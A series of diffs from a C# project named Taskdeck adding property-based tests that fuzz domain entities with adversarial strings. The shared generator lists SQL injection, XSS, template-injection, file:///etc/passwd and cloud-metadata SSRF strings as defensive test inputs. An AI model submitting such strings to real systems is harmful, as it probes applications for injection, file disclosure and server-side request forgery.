+            doc.Content.Length.Should().Be(length);
+        }
+    }
+
+    // ─────────────────────── SourceUrl boundary ───────────────────────
+
+    [Theory]
+    [InlineData(2001)]
+    [InlineData(5000)]
+    public void SourceUrl_ExceedingLimit_Throws(int length)
+    {
+        var url = new string('u', length);
+        var act = () => new KnowledgeDocument(
+            Guid.NewGuid(), "Title", "Content", KnowledgeSourceType.Manual,
+            sourceUrl: url);
+        act.Should().Throw<DomainException>()
+            .Where(e => e.ErrorCode == ErrorCodes.ValidationError);
+    }
+
+    [Theory]
+    [InlineData(1)]
+    [InlineData(2000)]
+    public void SourceUrl_WithinLimit_Succeeds(int length)
+    {
+        var url = new string('u', length);
+        var doc = new KnowledgeDocument(
+            Guid.NewGuid(), "Title", "Content", KnowledgeSourceType.Manual,
+            sourceUrl: url);
+        doc.SourceUrl.Should().Be(url);
+    }
+
+    // ─────────────────────── Tags boundary ───────────────────────
+
+    [Theory]
+    [InlineData(2001)]
+    [InlineData(5000)]
+    public void Tags_ExceedingLimit_Throws(int length)
+    {
+        var tags = new string('t', length);
+        var act = () => new KnowledgeDocument(
+            Guid.NewGuid(), "Title", "Content", KnowledgeSourceType.Manual,
+            tags: tags);
+        act.Should().Throw<DomainException>()
+            .Where(e => e.ErrorCode == ErrorCodes.ValidationError);
+    }
+
+    // ─────────────────────── Adversarial input handling ───────────────────────
+
+    [Property(MaxTest = MaxTests)]
+    public Property Constructor_NeverThrowsUnhandled_OnAdversarialTitle()
+    {
+        return Prop.ForAll(
+            Arb.From(AdversarialStringGen()),
+            title =>
+            {
+                try
+                {
+                    _ = new KnowledgeDocument(
+                        Guid.NewGuid(), title, "Valid content", KnowledgeSourceType.Manual);
+                }
+                catch (DomainException)
+                {
+                    // Expected
+                }
+                catch (Exception ex) when (ex is NullReferenceException or ArgumentException
+                    or FormatException or IndexOutOfRangeException or OverflowException)
+                {
+                    throw new Exception(
+                        $"KnowledgeDocument constructor threw unexpected {ex.GetType().Name}: {ex.Message}");
+                }
+            });
+    }
+
+    [Property(MaxTest = MaxTests)]
+    public Property Constructor_NeverThrowsUnhandled_OnAdversarialContent()
+    {
+        return Prop.ForAll(
+            Arb.From(AdversarialStringGen()),
+            content =>
+            {
+                try
+                {
+                    _ = new KnowledgeDocument(
+                        Guid.NewGuid(), "Title", content, KnowledgeSourceType.Manual);
+                }
+                catch (DomainException)
+                {
+                    // Expected
+                }
+                catch (Exception ex) when (ex is NullReferenceException or ArgumentException
+                    or FormatException or IndexOutOfRangeException or OverflowException)
+                {
+                    throw new Exception(
+                        $"KnowledgeDocument constructor threw unexpected {ex.GetType().Name}: {ex.Message}");
+                }
+            });
+    }
+
+    // ─────────────────────── Archive lifecycle ───────────────────────
+
+    [Property(MaxTest = MaxTests)]
+    public Property ArchiveUnarchive_CyclePreservesContent()
+    {
+        return Prop.ForAll(
+            Arb.From(Gen.Choose(1, 5)),
+            cycles =>
+            {
+                var doc = new KnowledgeDocument(
+                    Guid.NewGuid(), "Title", "Content", KnowledgeSourceType.Manual);
+
+                for (int i = 0; i < cycles; i++)
+                {
+                    doc.Archive();
+                    doc.IsArchived.Should().BeTrue();
+                    doc.Unarchive();
+                    doc.IsArchived.Should().BeFalse();
+                }
+                doc.Title.Should().Be("Title");
+                doc.Content.Should().Be("Content");
+            });
+    }
+
+    [Fact]
+    public void Update_WhenArchived_Throws()
+    {
+        var doc = new KnowledgeDocument(
+            Guid.NewGuid(), "Title", "Content", KnowledgeSourceType.Manual);
+        doc.Archive();
+
+        var act = () => doc.Update("NewTitle", "NewContent");
+        act.Should().Throw<DomainException>()
+            .Where(e => e.ErrorCode == ErrorCodes.ValidationError);
+    }
+
+    [Property(MaxTest = MaxTests)]
+    public Property Update_WithAdversarialInputs_NeverThrowsUnhandled()
+    {
+        return Prop.ForAll(
+            Arb.From(AdversarialStringGen()),
+            Arb.From(AdversarialStringGen()),
+            (title, content) =>
+            {
+                var doc = new KnowledgeDocument(
+                    Guid.NewGuid(), "OriginalTitle", "OriginalContent",
+                    KnowledgeSourceType.Manual);
+                try
+                {
+                    doc.Update(title, content);
+                }
+                catch (DomainException)
+                {
+                    // Expected
+                }
+                catch (Exception ex) when (ex is NullReferenceException or ArgumentException
+                    or FormatException or IndexOutOfRangeException or OverflowException)
+                {
+                    throw new Exception(
+                        $"KnowledgeDocument.Update threw unexpected {ex.GetType().Name}: {ex.Message}");
+                }
+            });
+    }
+
+    // ─────────────────────── SQL injection stored verbatim ───────────────────────
+
+    [Theory]
+    [InlineData("'; DROP TABLE knowledge_documents; --")]
+    [InlineData("\" OR 1=1 --")]
+    public void SqlInjection_InTitle_StoredAsLiteral(string title)
+    {
+        var doc = new KnowledgeDocument(
+            Guid.NewGuid(), title, "Content", KnowledgeSourceType.Manual);
+        doc.Title.Should().Be(title, "SQL injection strings should be stored verbatim");
+    }
+}

--- a/backend/tests/Taskdeck.Domain.Tests/PropertyBased/KnowledgeDocumentPropertyTests.cs
+++ b/backend/tests/Taskdeck.Domain.Tests/PropertyBased/KnowledgeDocumentPropertyTests.cs
@@ -19,21 +19,6 @@ public class KnowledgeDocumentPropertyTests
 
     // ─────────────────────── Generators ───────────────────────
 
-    private static Gen<string> AdversarialStringGen() => Gen.OneOf(
-        Gen.Constant("\u0000"),
-        Gen.Constant("\uFEFF"),
-        Gen.Constant("\u200B"),
-        Gen.Constant("<script>alert('xss')</script>"),
-        Gen.Constant("'; DROP TABLE knowledge; --"),
-        Gen.Constant("👨‍👩‍👧‍👦"),
-        Gen.Constant("田中太郎"),
-        Gen.Constant("{\"nested\": true}"),
-        Gen.Constant(""),
-        Gen.Constant(" "),
-        Gen.Constant((string)null!),
-        ArbMap.Default.ArbFor<string>().Generator.Where(s => s != null)
-    );
-
     private static Gen<string> ValidTitleGen() =>
         Gen.Choose(1, 200)
             .SelectMany(len =>
@@ -69,14 +54,13 @@ public class KnowledgeDocumentPropertyTests
             });
     }
 
-    [Property(MaxTest = MaxTests)]
-    public Property EmptyGuidUserId_AlwaysThrows()
+    [Fact]
+    public void EmptyGuidUserId_AlwaysThrows()
     {
         var act = () => new KnowledgeDocument(
             Guid.Empty, "Title", "Content", KnowledgeSourceType.Manual);
         act.Should().Throw<DomainException>()
             .Where(e => e.ErrorCode == ErrorCodes.ValidationError);
-        return true.ToProperty();
     }
 
     // ─────────────────────── Title boundary values ───────────────────────
@@ -178,7 +162,7 @@ public class KnowledgeDocumentPropertyTests
     public Property Constructor_NeverThrowsUnhandled_OnAdversarialTitle()
     {
         return Prop.ForAll(
-            Arb.From(AdversarialStringGen()),
+            Arb.From(TestGenerators.AdversarialStringGen()),
             title =>
             {
                 try
@@ -203,7 +187,7 @@ public class KnowledgeDocumentPropertyTests
     public Property Constructor_NeverThrowsUnhandled_OnAdversarialContent()
     {
         return Prop.ForAll(
-            Arb.From(AdversarialStringGen()),
+            Arb.From(TestGenerators.AdversarialStringGen()),
             content =>
             {
                 try
@@ -264,8 +248,8 @@ public class KnowledgeDocumentPropertyTests
     public Property Update_WithAdversarialInputs_NeverThrowsUnhandled()
     {
         return Prop.ForAll(
-            Arb.From(AdversarialStringGen()),
-            Arb.From(AdversarialStringGen()),
+            Arb.From(TestGenerators.AdversarialStringGen()),
+            Arb.From(TestGenerators.AdversarialStringGen()),
             (title, content) =>
             {
                 var doc = new KnowledgeDocument(

--- a/backend/tests/Taskdeck.Domain.Tests/PropertyBased/NotificationPropertyTests.cs
+++ b/backend/tests/Taskdeck.Domain.Tests/PropertyBased/NotificationPropertyTests.cs
@@ -1,0 +1,271 @@
+using FluentAssertions;
+using FsCheck;
+using FsCheck.Fluent;
+using FsCheck.Xunit;
+using Taskdeck.Domain.Entities;
+using Taskdeck.Domain.Exceptions;
+using Xunit;
+
+namespace Taskdeck.Domain.Tests.PropertyBased;
+
+/// <summary>
+/// Property-based tests for Notification entity invariants.
+/// Verifies title/message length boundaries, adversarial input handling,
+/// and read/unread state machine transitions.
+/// </summary>
+public class NotificationPropertyTests
+{
+    private const int MaxTests = 200;
+
+    // ─────────────────────── Generators ───────────────────────
+
+    private static Gen<string> AdversarialStringGen() => Gen.OneOf(
+        Gen.Constant("\u0000"),
+        Gen.Constant("\uFEFF"),
+        Gen.Constant("\u200B"),
+        Gen.Constant("\u202E"),
+        Gen.Constant("<script>alert('xss')</script>"),
+        Gen.Constant("'; DROP TABLE notifications; --"),
+        Gen.Constant("👨‍👩‍👧‍👦"),
+        Gen.Constant("田中太郎"),
+        Gen.Constant("{\"nested\": true}"),
+        Gen.Constant(""),
+        Gen.Constant(" "),
+        Gen.Constant((string)null!),
+        ArbMap.Default.ArbFor<string>().Generator.Where(s => s != null)
+    );
+
+    private static Gen<NotificationType> NotificationTypeGen() =>
+        Gen.Elements(
+            NotificationType.Mention,
+            NotificationType.Assignment,
+            NotificationType.ProposalOutcome,
+            NotificationType.BoardChange,
+            NotificationType.System);
+
+    private static Gen<NotificationCadence> CadenceGen() =>
+        Gen.Elements(NotificationCadence.Immediate, NotificationCadence.Digest);
+
+    // ─────────────────────── Construction properties ───────────────────────
+
+    [Property(MaxTest = MaxTests)]
+    public Property ValidParams_AlwaysCreatesNotification()
+    {
+        return Prop.ForAll(
+            Arb.From(NotificationTypeGen()),
+            Arb.From(CadenceGen()),
+            (type, cadence) =>
+            {
+                var notification = new Notification(
+                    Guid.NewGuid(), type, cadence, "Valid Title", "Valid message content");
+                notification.Type.Should().Be(type);
+                notification.Cadence.Should().Be(cadence);
+                notification.Title.Should().Be("Valid Title");
+                notification.Message.Should().Be("Valid message content");
+                notification.IsRead.Should().BeFalse();
+                notification.ReadAt.Should().BeNull();
+            });
+    }
+
+    [Property(MaxTest = MaxTests)]
+    public Property EmptyGuidUserId_AlwaysThrows()
+    {
+        var act = () => new Notification(
+            Guid.Empty, NotificationType.System, NotificationCadence.Immediate,
+            "Title", "Message");
+        act.Should().Throw<DomainException>()
+            .Where(e => e.ErrorCode == ErrorCodes.ValidationError);
+        return true.ToProperty();
+    }
+
+    // ─────────────────────── Title boundary values ───────────────────────
+
+    [Theory]
+    [InlineData(0)]
+    [InlineData(1)]
+    [InlineData(160)]
+    [InlineData(161)]
+    [InlineData(1000)]
+    public void Notification_TitleLength_HandledCorrectly(int length)
+    {
+        var title = length == 0 ? "" : new string('t', length);
+        var act = () => new Notification(
+            Guid.NewGuid(), NotificationType.System, NotificationCadence.Immediate,
+            title, "Valid message");
+
+        if (length == 0 || length > 160)
+        {
+            act.Should().Throw<DomainException>()
+                .Where(e => e.ErrorCode == ErrorCodes.ValidationError);
+        }
+        else
+        {
+            var n = act();
+            n.Title.Length.Should().Be(length);
+        }
+    }
+
+    // ─────────────────────── Message boundary values ───────────────────────
+
+    [Theory]
+    [InlineData(0)]
+    [InlineData(1)]
+    [InlineData(2000)]
+    [InlineData(2001)]
+    [InlineData(10_000)]
+    public void Notification_MessageLength_HandledCorrectly(int length)
+    {
+        var message = length == 0 ? "" : new string('m', length);
+        var act = () => new Notification(
+            Guid.NewGuid(), NotificationType.System, NotificationCadence.Immediate,
+            "Title", message);
+
+        if (length == 0 || length > 2000)
+        {
+            act.Should().Throw<DomainException>()
+                .Where(e => e.ErrorCode == ErrorCodes.ValidationError);
+        }
+        else
+        {
+            var n = act();
+            n.Message.Length.Should().Be(length);
+        }
+    }
+
+    // ─────────────────────── Adversarial input handling ───────────────────────
+
+    [Property(MaxTest = MaxTests)]
+    public Property Constructor_NeverThrowsUnhandled_OnAdversarialTitle()
+    {
+        return Prop.ForAll(
+            Arb.From(AdversarialStringGen()),
+            title =>
+            {
+                try
+                {
+                    _ = new Notification(
+                        Guid.NewGuid(), NotificationType.System, NotificationCadence.Immediate,
+                        title, "Valid message");
+                }
+                catch (DomainException)
+                {
+                    // Expected for invalid titles
+                }
+                catch (Exception ex) when (ex is NullReferenceException or ArgumentException
+                    or FormatException or IndexOutOfRangeException or OverflowException)
+                {
+                    throw new Exception(
+                        $"Notification constructor threw unexpected {ex.GetType().Name} for title: {ex.Message}");
+                }
+            });
+    }
+
+    [Property(MaxTest = MaxTests)]
+    public Property Constructor_NeverThrowsUnhandled_OnAdversarialMessage()
+    {
+        return Prop.ForAll(
+            Arb.From(AdversarialStringGen()),
+            message =>
+            {
+                try
+                {
+                    _ = new Notification(
+                        Guid.NewGuid(), NotificationType.System, NotificationCadence.Immediate,
+                        "Valid Title", message);
+                }
+                catch (DomainException)
+                {
+                    // Expected for invalid messages
+                }
+                catch (Exception ex) when (ex is NullReferenceException or ArgumentException
+                    or FormatException or IndexOutOfRangeException or OverflowException)
+                {
+                    throw new Exception(
+                        $"Notification constructor threw unexpected {ex.GetType().Name} for message: {ex.Message}");
+                }
+            });
+    }
+
+    // ─────────────────────── SourceEntityType boundary ───────────────────────
+
+    [Theory]
+    [InlineData(51)]
+    [InlineData(100)]
+    public void SourceEntityType_ExceedingLimit_Throws(int length)
+    {
+        var sourceType = new string('s', length);
+        var act = () => new Notification(
+            Guid.NewGuid(), NotificationType.System, NotificationCadence.Immediate,
+            "Title", "Message", sourceEntityType: sourceType);
+        act.Should().Throw<DomainException>()
+            .Where(e => e.ErrorCode == ErrorCodes.ValidationError);
+    }
+
+    [Theory]
+    [InlineData(1)]
+    [InlineData(50)]
+    public void SourceEntityType_WithinLimit_Succeeds(int length)
+    {
+        var sourceType = new string('s', length);
+        var n = new Notification(
+            Guid.NewGuid(), NotificationType.System, NotificationCadence.Immediate,
+            "Title", "Message", sourceEntityType: sourceType);
+        n.SourceEntityType.Should().Be(sourceType);
+    }
+
+    // ─────────────────────── DeduplicationKey boundary ───────────────────────
+
+    [Theory]
+    [InlineData(201)]
+    [InlineData(500)]
+    public void DeduplicationKey_ExceedingLimit_Throws(int length)
+    {
+        var key = new string('k', length);
+        var act = () => new Notification(
+            Guid.NewGuid(), NotificationType.System, NotificationCadence.Immediate,
+            "Title", "Message", deduplicationKey: key);
+        act.Should().Throw<DomainException>()
+            .Where(e => e.ErrorCode == ErrorCodes.ValidationError);
+    }
+
+    // ─────────────────────── Read/Unread state machine ───────────────────────
+
+    [Property(MaxTest = MaxTests)]
+    public Property MarkReadUnread_CycleIsIdempotent()
+    {
+        return Prop.ForAll(
+            Arb.From(Gen.Choose(1, 10)),
+            cycles =>
+            {
+                var n = new Notification(
+                    Guid.NewGuid(), NotificationType.System, NotificationCadence.Immediate,
+                    "Title", "Message");
+
+                for (int i = 0; i < cycles; i++)
+                {
+                    n.MarkAsRead();
+                    n.IsRead.Should().BeTrue();
+                    n.ReadAt.Should().NotBeNull();
+
+                    n.MarkAsUnread();
+                    n.IsRead.Should().BeFalse();
+                    n.ReadAt.Should().BeNull();
+                }
+            });
+    }
+
+    [Fact]
+    public void MarkAsRead_WhenAlreadyRead_IsIdempotent()
+    {
+        var n = new Notification(
+            Guid.NewGuid(), NotificationType.System, NotificationCadence.Immediate,
+            "Title", "Message");
+        n.MarkAsRead();
+        var firstReadAt = n.ReadAt;
+
+        // Second call should not change ReadAt
+        n.MarkAsRead();
+        n.IsRead.Should().BeTrue();
+        n.ReadAt.Should().Be(firstReadAt);
+    }
+}

--- a/backend/tests/Taskdeck.Domain.Tests/PropertyBased/NotificationPropertyTests.cs
+++ b/backend/tests/Taskdeck.Domain.Tests/PropertyBased/NotificationPropertyTests.cs
@@ -19,22 +19,6 @@ public class NotificationPropertyTests
 
     // ─────────────────────── Generators ───────────────────────
 
-    private static Gen<string> AdversarialStringGen() => Gen.OneOf(
-        Gen.Constant("\u0000"),
-        Gen.Constant("\uFEFF"),
-        Gen.Constant("\u200B"),
-        Gen.Constant("\u202E"),
-        Gen.Constant("<script>alert('xss')</script>"),
-        Gen.Constant("'; DROP TABLE notifications; --"),
-        Gen.Constant("👨‍👩‍👧‍👦"),
-        Gen.Constant("田中太郎"),
-        Gen.Constant("{\"nested\": true}"),
-        Gen.Constant(""),
-        Gen.Constant(" "),
-        Gen.Constant((string)null!),
-        ArbMap.Default.ArbFor<string>().Generator.Where(s => s != null)
-    );
-
     private static Gen<NotificationType> NotificationTypeGen() =>
         Gen.Elements(
             NotificationType.Mention,
@@ -67,15 +51,14 @@ public class NotificationPropertyTests
             });
     }
 
-    [Property(MaxTest = MaxTests)]
-    public Property EmptyGuidUserId_AlwaysThrows()
+    [Fact]
+    public void EmptyGuidUserId_AlwaysThrows()
     {
         var act = () => new Notification(
             Guid.Empty, NotificationType.System, NotificationCadence.Immediate,
             "Title", "Message");
         act.Should().Throw<DomainException>()
             .Where(e => e.ErrorCode == ErrorCodes.ValidationError);
-        return true.ToProperty();
     }
 
     // ─────────────────────── Title boundary values ───────────────────────
@@ -138,7 +121,7 @@ public class NotificationPropertyTests
     public Property Constructor_NeverThrowsUnhandled_OnAdversarialTitle()
     {
         return Prop.ForAll(
-            Arb.From(AdversarialStringGen()),
+            Arb.From(TestGenerators.AdversarialStringGen()),
             title =>
             {
                 try
@@ -164,7 +147,7 @@ public class NotificationPropertyTests
     public Property Constructor_NeverThrowsUnhandled_OnAdversarialMessage()
     {
         return Prop.ForAll(
-            Arb.From(AdversarialStringGen()),
+            Arb.From(TestGenerators.AdversarialStringGen()),
             message =>
             {
                 try

--- a/backend/tests/Taskdeck.Domain.Tests/PropertyBased/TestGenerators.cs
+++ b/backend/tests/Taskdeck.Domain.Tests/PropertyBased/TestGenerators.cs
@@ -1,0 +1,82 @@
+using FsCheck;
+using FsCheck.Fluent;
+
+namespace Taskdeck.Domain.Tests.PropertyBased;
+
+/// <summary>
+/// Shared FsCheck generators for property-based domain tests.
+/// Centralises adversarial string generation so all entity tests
+/// exercise the same comprehensive input space.
+/// </summary>
+internal static class TestGenerators
+{
+    /// <summary>
+    /// Generates adversarial strings covering: Unicode edge cases (null byte, BOM,
+    /// surrogates, zero-width, combining, CJK, Arabic, emoji), control characters
+    /// (bell, backspace, ANSI escape, CRLF), XSS/injection payloads (script tags,
+    /// SQL injection, prototype pollution, URI schemes), length boundaries (empty,
+    /// whitespace), explicit null, and FsCheck random strings.
+    /// </summary>
+    public static Gen<string> AdversarialStringGen() => Gen.OneOf(
+        // Unicode edge cases
+        Gen.Constant("\u0000"),                        // null byte
+        Gen.Constant("\uFEFF"),                        // BOM
+        Gen.Constant("\uFFFD"),                        // replacement character
+        Gen.Constant("\uD800"),                        // lone high surrogate (invalid)
+        Gen.Constant("\uDBFF\uDFFF"),                  // max surrogate pair
+        Gen.Constant("\u200B"),                        // zero-width space
+        Gen.Constant("\u200E"),                        // left-to-right mark
+        Gen.Constant("\u202E"),                        // right-to-left override
+        Gen.Constant("\u0301"),                        // combining accent
+        Gen.Constant("\u00E9"),                        // precomposed e-acute
+        Gen.Constant("e\u0301"),                       // decomposed equivalent
+        Gen.Constant("\U0001F468\u200D\U0001F469\u200D\U0001F467\u200D\U0001F466"), // family emoji
+        Gen.Constant("\U0001D54B\U0001D564\U0001D564\U0001D565"), // math bold symbols
+        Gen.Constant("\u7530\u4E2D\u592A\u90CE"),      // CJK
+        Gen.Constant("\u0645\u0631\u062D\u0628\u0627"), // Arabic RTL
+        Gen.Constant("\u0E01\u0E38"),                   // Thai combining
+
+        // Control characters
+        Gen.Constant("\x01\x02\x03"),                  // ASCII control chars
+        Gen.Constant("\x07"),                           // bell
+        Gen.Constant("\x08"),                           // backspace
+        Gen.Constant("\x1B[31m"),                       // ANSI escape
+        Gen.Constant("\r\n\r\n"),                       // CRLF
+        Gen.Constant("\t\t\t"),                         // tabs
+
+        // XSS/injection payloads
+        Gen.Constant("<script>alert('xss')</script>"),
+        Gen.Constant("'; DROP TABLE boards; --"),
+        Gen.Constant("\" OR 1=1 --"),
+        Gen.Constant("<img src=x onerror=alert(1)>"),
+        Gen.Constant("{{constructor.constructor('return this')()}}"),
+        Gen.Constant("javascript:alert(1)"),
+        Gen.Constant("data:text/html,<script>alert(1)</script>"),
+        Gen.Constant("${7*7}"),                        // template injection
+        Gen.Constant("#{7*7}"),                        // template injection
+
+        // URI scheme attacks (relevant for webhook URLs, stored URLs)
+        Gen.Constant("file:///etc/passwd"),
+        Gen.Constant("http://169.254.169.254/"),       // SSRF
+
+        // Length boundary strings
+        Gen.Constant(""),                              // empty
+        Gen.Constant(" "),                             // single space
+        Gen.Constant(new string('\t', 50)),            // many tabs
+        Gen.Constant(new string('\n', 50)),            // many newlines
+
+        // Explicit null
+        Gen.Constant((string)null!),
+
+        // Arbitrary from FsCheck (filter nulls -- null is already covered above)
+        ArbMap.Default.ArbFor<string>().Generator.Where(s => s != null)
+    );
+
+    /// <summary>
+    /// Wraps <see cref="AdversarialStringGen"/> as nullable for optional-field testing.
+    /// </summary>
+    public static Gen<string?> NullableAdversarialStringGen() => Gen.OneOf(
+        Gen.Constant((string?)null),
+        AdversarialStringGen().Select(s => (string?)s)
+    );
+}

--- a/backend/tests/Taskdeck.Domain.Tests/PropertyBased/WebhookSubscriptionPropertyTests.cs
+++ b/backend/tests/Taskdeck.Domain.Tests/PropertyBased/WebhookSubscriptionPropertyTests.cs
@@ -1,0 +1,306 @@
+using FluentAssertions;
+using FsCheck;
+using FsCheck.Fluent;
+using FsCheck.Xunit;
+using Taskdeck.Domain.Entities;
+using Taskdeck.Domain.Exceptions;
+using Xunit;
+
+namespace Taskdeck.Domain.Tests.PropertyBased;
+
+/// <summary>
+/// Property-based tests for OutboundWebhookSubscription entity invariants.
+/// Verifies endpoint URL validation, signing secret handling, event filter normalization,
+/// revocation lifecycle, and adversarial input handling.
+/// </summary>
+public class WebhookSubscriptionPropertyTests
+{
+    private const int MaxTests = 200;
+
+    // ─────────────────────── Generators ───────────────────────
+
+    private static Gen<string> AdversarialStringGen() => Gen.OneOf(
+        Gen.Constant("\u0000"),
+        Gen.Constant("\uFEFF"),
+        Gen.Constant("\u200B"),
+        Gen.Constant("<script>alert('xss')</script>"),
+        Gen.Constant("javascript:alert(1)"),
+        Gen.Constant("data:text/html,<script>alert(1)</script>"),
+        Gen.Constant("file:///etc/passwd"),
+        Gen.Constant("http://169.254.169.254/"),
+        Gen.Constant("'; DROP TABLE webhooks; --"),
+        Gen.Constant(""),
+        Gen.Constant(" "),
+        Gen.Constant((string)null!),
+        ArbMap.Default.ArbFor<string>().Generator.Where(s => s != null)
+    );
+
+    private static Gen<string> ValidUrlGen() =>
+        Gen.Elements(
+            "https://example.com/webhook",
+            "https://hooks.slack.com/T00/B00/xxxx",
+            "https://example.com:8443/api/webhook",
+            "https://very-long-domain.example.com/path/to/webhook");
+
+    private static Gen<string> ValidSecretGen() =>
+        Gen.Choose(10, 100)
+            .SelectMany(len =>
+                Gen.ArrayOf(Gen.Elements(
+                    'a', 'b', 'c', 'A', 'B', 'C', '0', '1', '2', '3', '4', '5'), len)
+                .Select(chars => new string(chars)));
+
+    // ─────────────────────── Construction properties ───────────────────────
+
+    [Property(MaxTest = MaxTests)]
+    public Property ValidParams_AlwaysCreatesSubscription()
+    {
+        return Prop.ForAll(
+            Arb.From(ValidUrlGen()),
+            Arb.From(ValidSecretGen()),
+            (url, secret) =>
+            {
+                var sub = new OutboundWebhookSubscription(
+                    Guid.NewGuid(), Guid.NewGuid(), url, secret);
+                sub.EndpointUrl.Should().Be(url);
+                sub.SigningSecret.Should().Be(secret);
+                sub.IsActive.Should().BeTrue();
+                sub.EventFilters.Should().Be("*");
+                sub.RevokedAt.Should().BeNull();
+            });
+    }
+
+    [Fact]
+    public void EmptyBoardId_Throws()
+    {
+        var act = () => new OutboundWebhookSubscription(
+            Guid.Empty, Guid.NewGuid(), "https://example.com/webhook", "secret123");
+        act.Should().Throw<DomainException>()
+            .Where(e => e.ErrorCode == ErrorCodes.ValidationError);
+    }
+
+    [Fact]
+    public void EmptyCreatedByUserId_Throws()
+    {
+        var act = () => new OutboundWebhookSubscription(
+            Guid.NewGuid(), Guid.Empty, "https://example.com/webhook", "secret123");
+        act.Should().Throw<DomainException>()
+            .Where(e => e.ErrorCode == ErrorCodes.ValidationError);
+    }
+
+    // ─────────────────────── EndpointUrl boundary ───────────────────────
+
+    [Theory]
+    [InlineData(501)]
+    [InlineData(1000)]
+    public void EndpointUrl_ExceedingLimit_Throws(int length)
+    {
+        var url = "https://" + new string('a', length - 8);
+        var act = () => new OutboundWebhookSubscription(
+            Guid.NewGuid(), Guid.NewGuid(), url, "secret123");
+        act.Should().Throw<DomainException>()
+            .Where(e => e.ErrorCode == ErrorCodes.ValidationError);
+    }
+
+    [Theory]
+    [InlineData(1)]
+    [InlineData(500)]
+    public void EndpointUrl_WithinLimit_Succeeds(int length)
+    {
+        var url = new string('u', length);
+        var sub = new OutboundWebhookSubscription(
+            Guid.NewGuid(), Guid.NewGuid(), url, "secret123");
+        sub.EndpointUrl.Should().Be(url);
+    }
+
+    // ─────────────────────── SigningSecret boundary ───────────────────────
+
+    [Theory]
+    [InlineData(201)]
+    [InlineData(500)]
+    public void SigningSecret_ExceedingLimit_Throws(int length)
+    {
+        var secret = new string('s', length);
+        var act = () => new OutboundWebhookSubscription(
+            Guid.NewGuid(), Guid.NewGuid(), "https://example.com/webhook", secret);
+        act.Should().Throw<DomainException>()
+            .Where(e => e.ErrorCode == ErrorCodes.ValidationError);
+    }
+
+    // ─────────────────────── Adversarial URL handling ───────────────────────
+
+    [Property(MaxTest = MaxTests)]
+    public Property Constructor_NeverThrowsUnhandled_OnAdversarialUrl()
+    {
+        return Prop.ForAll(
+            Arb.From(AdversarialStringGen()),
+            url =>
+            {
+                try
+                {
+                    _ = new OutboundWebhookSubscription(
+                        Guid.NewGuid(), Guid.NewGuid(), url, "secret123");
+                }
+                catch (DomainException)
+                {
+                    // Expected for invalid URLs
+                }
+                catch (Exception ex) when (ex is NullReferenceException or ArgumentException
+                    or FormatException or IndexOutOfRangeException or OverflowException
+                    or UriFormatException)
+                {
+                    throw new Exception(
+                        $"WebhookSubscription constructor threw unexpected {ex.GetType().Name}: {ex.Message}");
+                }
+            });
+    }
+
+    [Property(MaxTest = MaxTests)]
+    public Property Constructor_NeverThrowsUnhandled_OnAdversarialSecret()
+    {
+        return Prop.ForAll(
+            Arb.From(AdversarialStringGen()),
+            secret =>
+            {
+                try
+                {
+                    _ = new OutboundWebhookSubscription(
+                        Guid.NewGuid(), Guid.NewGuid(), "https://example.com/webhook", secret);
+                }
+                catch (DomainException)
+                {
+                    // Expected for invalid secrets
+                }
+                catch (Exception ex) when (ex is NullReferenceException or ArgumentException
+                    or FormatException or IndexOutOfRangeException or OverflowException)
+                {
+                    throw new Exception(
+                        $"WebhookSubscription constructor threw unexpected {ex.GetType().Name}: {ex.Message}");
+                }
+            });
+    }
+
+    // ─────────────────────── Event filter handling ───────────────────────
+
+    [Property(MaxTest = MaxTests)]
+    public Property EventFilters_WithAdversarialStrings_NeverThrowUnhandled()
+    {
+        return Prop.ForAll(
+            Arb.From(AdversarialStringGen()),
+            filter =>
+            {
+                try
+                {
+                    _ = new OutboundWebhookSubscription(
+                        Guid.NewGuid(), Guid.NewGuid(), "https://example.com/webhook", "secret123",
+                        new[] { filter });
+                }
+                catch (DomainException)
+                {
+                    // Expected for invalid filters
+                }
+                catch (Exception ex) when (ex is NullReferenceException or ArgumentException
+                    or FormatException or IndexOutOfRangeException or OverflowException)
+                {
+                    throw new Exception(
+                        $"WebhookSubscription constructor threw unexpected {ex.GetType().Name} for filter: {ex.Message}");
+                }
+            });
+    }
+
+    [Fact]
+    public void NullEventFilters_DefaultsToWildcard()
+    {
+        var sub = new OutboundWebhookSubscription(
+            Guid.NewGuid(), Guid.NewGuid(), "https://example.com/webhook", "secret123",
+            eventFilters: null);
+        sub.EventFilters.Should().Be("*");
+    }
+
+    [Fact]
+    public void EmptyEventFilters_DefaultsToWildcard()
+    {
+        var sub = new OutboundWebhookSubscription(
+            Guid.NewGuid(), Guid.NewGuid(), "https://example.com/webhook", "secret123",
+            eventFilters: Array.Empty<string>());
+        sub.EventFilters.Should().Be("*");
+    }
+
+    // ─────────────────────── MatchesEvent adversarial ───────────────────────
+
+    [Property(MaxTest = MaxTests)]
+    public Property MatchesEvent_NeverThrowsUnhandled_OnAdversarialEventType()
+    {
+        return Prop.ForAll(
+            Arb.From(AdversarialStringGen()),
+            eventType =>
+            {
+                var sub = new OutboundWebhookSubscription(
+                    Guid.NewGuid(), Guid.NewGuid(), "https://example.com/webhook", "secret123");
+                try
+                {
+                    var result = sub.MatchesEvent(eventType);
+                    // Wildcard should match non-empty strings
+                    if (!string.IsNullOrWhiteSpace(eventType))
+                    {
+                        result.Should().BeTrue("wildcard filter should match any non-empty event type");
+                    }
+                }
+                catch (Exception ex) when (ex is NullReferenceException or ArgumentException)
+                {
+                    throw new Exception(
+                        $"MatchesEvent threw unexpected {ex.GetType().Name}: {ex.Message}");
+                }
+            });
+    }
+
+    // ─────────────────────── Revocation lifecycle ───────────────────────
+
+    [Fact]
+    public void Revoke_EmptyGuid_Throws()
+    {
+        var sub = new OutboundWebhookSubscription(
+            Guid.NewGuid(), Guid.NewGuid(), "https://example.com/webhook", "secret123");
+        var act = () => sub.Revoke(Guid.Empty);
+        act.Should().Throw<DomainException>()
+            .Where(e => e.ErrorCode == ErrorCodes.ValidationError);
+    }
+
+    [Fact]
+    public void Revoke_WhenAlreadyRevoked_Throws()
+    {
+        var sub = new OutboundWebhookSubscription(
+            Guid.NewGuid(), Guid.NewGuid(), "https://example.com/webhook", "secret123");
+        sub.Revoke(Guid.NewGuid());
+        sub.IsActive.Should().BeFalse();
+
+        var act = () => sub.Revoke(Guid.NewGuid());
+        act.Should().Throw<DomainException>()
+            .Where(e => e.ErrorCode == ErrorCodes.InvalidOperation);
+    }
+
+    [Fact]
+    public void RotateSecret_WhenRevoked_Throws()
+    {
+        var sub = new OutboundWebhookSubscription(
